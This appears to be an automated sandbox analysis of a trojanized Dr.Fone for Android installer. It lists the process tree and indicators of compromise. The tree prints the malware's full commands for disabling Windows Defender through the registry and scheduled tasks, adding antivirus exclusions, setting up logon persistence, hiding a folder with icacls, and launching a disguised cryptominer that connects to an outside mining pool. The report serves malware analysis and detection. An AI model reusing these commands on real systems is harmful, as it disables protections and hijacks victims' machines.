Token: SeSecurityPrivilege	3896	7z.exe
Token: SeRestorePrivilege	3672	7z.exe
Token: 35	3672	7z.exe
Token: SeSecurityPrivilege	3672	7z.exe
Token: SeSecurityPrivilege	3672	7z.exe
Token: SeRestorePrivilege	4040	7z.exe
Token: 35	4040	7z.exe
Token: SeSecurityPrivilege	4040	7z.exe
Token: SeSecurityPrivilege	4040	7z.exe
Token: SeDebugPrivilege	3672	powershell.exe
Token: SeDebugPrivilege	1956	ProcessKiller.exe
Token: SeDebugPrivilege	2220	regasm.exe
Token: SeDebugPrivilege	2216	nbdrivesllapi.exe
Token: SeDebugPrivilege	3660	MUIServices.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

DrfoneForAndroid.tmpdrfone-for-android_full1544.tmp

pid process

1776 DrfoneForAndroid.tmp
1908 drfone-for-android_full1544.tmp
Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

iexplore.exe

pid process

3808 iexplore.exe

pid	process
3808	iexplore.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

DrfoneForAndroid.exeDrfoneForAndroid.tmpWScript.exedrfone-for-android_full1544.execmd.exe

description	pid	process	target process
PID 744 wrote to memory of 1776	744	DrfoneForAndroid.exe	DrfoneForAndroid.tmp
PID 744 wrote to memory of 1776	744	DrfoneForAndroid.exe	DrfoneForAndroid.tmp
PID 744 wrote to memory of 1776	744	DrfoneForAndroid.exe	DrfoneForAndroid.tmp
PID 1776 wrote to memory of 204	1776	DrfoneForAndroid.tmp	WScript.exe
PID 1776 wrote to memory of 204	1776	DrfoneForAndroid.tmp	WScript.exe
PID 1776 wrote to memory of 204	1776	DrfoneForAndroid.tmp	WScript.exe
PID 1776 wrote to memory of 1452	1776	DrfoneForAndroid.tmp	drfone-for-android_full1544.exe
PID 1776 wrote to memory of 1452	1776	DrfoneForAndroid.tmp	drfone-for-android_full1544.exe
PID 1776 wrote to memory of 1452	1776	DrfoneForAndroid.tmp	drfone-for-android_full1544.exe
PID 204 wrote to memory of 3664	204	WScript.exe	cmd.exe
PID 204 wrote to memory of 3664	204	WScript.exe	cmd.exe
PID 204 wrote to memory of 3664	204	WScript.exe	cmd.exe
PID 1452 wrote to memory of 1908	1452	drfone-for-android_full1544.exe	drfone-for-android_full1544.tmp
PID 1452 wrote to memory of 1908	1452	drfone-for-android_full1544.exe	drfone-for-android_full1544.tmp
PID 1452 wrote to memory of 1908	1452	drfone-for-android_full1544.exe	drfone-for-android_full1544.tmp
PID 3664 wrote to memory of 1004	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1004	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1004	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1040	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1040	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1040	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1552	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1552	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1552	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1784	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1784	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1784	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3784	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3784	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3784	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2600	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2600	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2600	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3756	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3756	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3756	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2032	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2032	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2032	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3892	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3892	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3892	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 192	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 192	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 192	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1780	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1780	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1780	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2216	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2216	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2216	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3896	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3896	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3896	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2744	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2744	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 2744	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3760	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3760	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3760	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1704	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1704	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 1704	3664	cmd.exe	reg.exe
PID 3664 wrote to memory of 3688	3664	cmd.exe	reg.exe

C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe
"C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:744

C:\Users\Admin\AppData\Local\Temp\is-RD29G.tmp\DrfoneForAndroid.tmp
"C:\Users\Admin\AppData\Local\Temp\is-RD29G.tmp\DrfoneForAndroid.tmp" /SL5="$2013A,122034549,734208,C:\Users\Admin\AppData\Local\Temp\DrfoneForAndroid.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:1776

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\ProgramData\ocIiQTVv14pHbbM\iphjManIMEPA.vbs"
3⤵
- Suspicious use of WriteProcessMemory
PID:204

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\mevpxum30dAV.bat" "
4⤵
- Suspicious use of WriteProcessMemory
PID:3664

C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:1004

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f
5⤵
PID:1040

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SgrmBroker" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1552

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:1784

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
5⤵
PID:3784

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "0" /f
5⤵
PID:2600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
5⤵
PID:3756

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
5⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
5⤵
PID:192

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
5⤵
PID:1780

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
5⤵
PID:2216

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
5⤵
PID:3896

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
5⤵
PID:2744

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
5⤵
PID:3760

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
5⤵
PID:1704

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f
5⤵
PID:3688

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:3608

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
5⤵
PID:1052

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
5⤵
PID:4040

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
5⤵
PID:1520

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
5⤵
PID:856

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
5⤵
PID:2316

C:\Windows\SysWOW64\schtasks.exe
schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
5⤵
PID:1008

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f
5⤵
PID:1236

C:\Windows\SysWOW64\reg.exe
reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f
5⤵
PID:2296

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:3880

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2196

C:\Windows\SysWOW64\reg.exe
reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
5⤵
PID:2220

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2600

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3756

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:2032

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:3892

C:\Windows\SysWOW64\reg.exe
reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
5⤵
PID:192

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".exe""
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1780

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -command "Add-MpPreference -ExclusionExtension ".vbs""
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3672

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\main.bat" "
4⤵
PID:3924

C:\Windows\SysWOW64\mode.com
mode 65,10
5⤵
PID:1004

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e file.zip -p___________14565pwd7455pwd31616___________ -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1008

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_8.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3780

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_7.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:1816

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_6.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2564

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_5.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2512

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_4.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3892

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_3.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3896

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_2.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:3672

C:\ProgramData\ocIiQTVv14pHbbM\7z.exe
7z.exe e extracted/file_1.zip -oextracted
5⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:4040

C:\ProgramData\ocIiQTVv14pHbbM\iexplore.exe
"iexplore.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
PID:3808

C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
6⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2220

C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe
"C:\Users\Admin\AppData\Local\Temp\nvnodejslauncher.exe"
7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:1144

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)" & icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
8⤵
PID:3712

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-1-0:(R,REA,RA,RD)"
9⤵
- Modifies file permissions
PID:932

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "*S-1-5-7:(R,REA,RA,RD)"
9⤵
- Modifies file permissions
PID:3808

C:\Windows\SysWOW64\icacls.exe
icacls "C:\Users\Admin\AppData\Roaming\Mxmetamux" /inheritance:e /deny "Admin:(R,REA,RA,RD)"
9⤵
- Modifies file permissions
PID:3476

C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe
"C:\Users\Admin\AppData\Local\Temp\nbdrivesllapi.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2216

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"' & exit
8⤵
PID:512

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"'
9⤵
- Creates scheduled task(s)
PID:2232

C:\Users\Admin\AppData\Local\Temp\MUIServices.exe
"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"
8⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3660

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"' & exit
9⤵
PID:1932

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc onlogon /rl highest /tn "MUIServices" /tr '"C:\Users\Admin\AppData\Local\Temp\MUIServices.exe"'
10⤵
- Creates scheduled task(s)
PID:1328

C:\Windows\explorer.exe
C:\Windows\explorer.exe --response-timeout=30 --farm-retries=30 --pool stratum://`0xadc1936d485897e6109feafea9fa5a7cf562381d`[email protected]:9999
9⤵
PID:2080

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ocIiQTVv14pHbbM\1x66wvmhfpDEL.bat" "
4⤵
PID:1052

C:\Windows\SysWOW64\timeout.exe
timeout /T 120 /NOBREAK
5⤵
- Delays execution with timeout.exe
PID:2084

C:\Program Files (x86)\drfone-for-android_full1544.exe
"C:\Program Files (x86)\drfone-for-android_full1544.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1452

C:\Users\Admin\AppData\Local\Temp\is-3CKI5.tmp\drfone-for-android_full1544.tmp
"C:\Users\Admin\AppData\Local\Temp\is-3CKI5.tmp\drfone-for-android_full1544.tmp" /SL5="$20210,102997482,134144,C:\Program Files (x86)\drfone-for-android_full1544.exe"
4⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Program Files directory
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
PID:1908

C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\ProcessKiller.exe
"C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\ProcessKiller.exe"
5⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1956

C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe
"C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe" /verysilent /NORESTART
5⤵
- Executes dropped EXE
PID:2256

C:\Users\Admin\AppData\Local\Temp\is-719IB.tmp\NetFxLite.tmp
"C:\Users\Admin\AppData\Local\Temp\is-719IB.tmp\NetFxLite.tmp" /SL5="$C0032,9653206,121344,C:\Users\Admin\AppData\Local\Temp\is-RL6L9.tmp\NetFxLite.exe" /verysilent /NORESTART
6⤵
- Executes dropped EXE
- Drops file in Windows directory
PID:3724

C:\Users\Admin\AppData\Local\Temp\is-KOA0V.tmp\NFWCHk.exe
C:\Users\Admin\AppData\Local\Temp\is-KOA0V.tmp\NFWCHk.exe
7⤵
- Executes dropped EXE
- Modifies system certificate store
PID:4092

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Xml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
7⤵
PID:720

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:1172

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 280 -InterruptEvent 0 -NGENProcess 258 -Pipe 27c -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:2720

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "Accessibility, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
PID:932

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 16c -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:1552

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 25c -InterruptEvent 0 -NGENProcess 258 -Pipe 260 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1008

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Drawing, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
- Drops file in Windows directory
PID:972

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:416

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 1e8 -Pipe 1d0 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1296

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Windows.Forms, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
7⤵
- Drops file in Windows directory
PID:668

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:2512

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 260 -Pipe 264 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1552

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
PID:2732

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:1500

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 1e0 -Pipe 1d8 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
PID:3708

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Security, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
PID:2208

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e4 -InterruptEvent 0 -NGENProcess 1d4 -Pipe 1e0 -Comment "NGen Worker Process"
8⤵
PID:1272

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 260 -InterruptEvent 0 -NGENProcess 1ec -Pipe 254 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
PID:3476

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Data.SqlXml, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" /NoDependencies /nologo
7⤵
- Drops file in Windows directory
PID:2388

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 150 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:3656

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 274 -InterruptEvent 0 -NGENProcess 2a4 -Pipe 280 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:3776

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 294 -InterruptEvent 0 -NGENProcess 28c -Pipe 288 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:1780

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.Management, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
- Drops file in Windows directory
PID:1764

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:856

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 258 -InterruptEvent 0 -NGENProcess 26c -Pipe 25c -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:932

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "CustomMarshalers, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
- Drops file in Windows directory
PID:496

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 1e0 -InterruptEvent 0 -NGENProcess 1d0 -Pipe 1dc -Comment "NGen Worker Process"
8⤵
PID:3348

C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe -StartupEvent 26c -InterruptEvent 0 -NGENProcess 278 -Pipe 264 -Comment "NGen Worker Process"
8⤵
- Loads dropped DLL
- Drops file in Windows directory
PID:4092

C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\ngen.exe" install "System.ServiceProcess, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a" /NoDependencies /nologo
7⤵
- Drops file in Windows directory
PID:3764

